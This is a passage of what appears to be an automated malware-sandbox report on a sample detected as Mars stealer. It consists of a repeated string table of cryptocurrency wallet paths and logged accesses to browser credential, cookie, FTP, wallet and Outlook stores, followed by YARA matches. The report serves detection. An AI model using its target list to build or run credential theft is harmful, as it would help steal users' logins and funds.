Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2874374264.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2614325718.0000000005B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2871918307.0000000001202000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
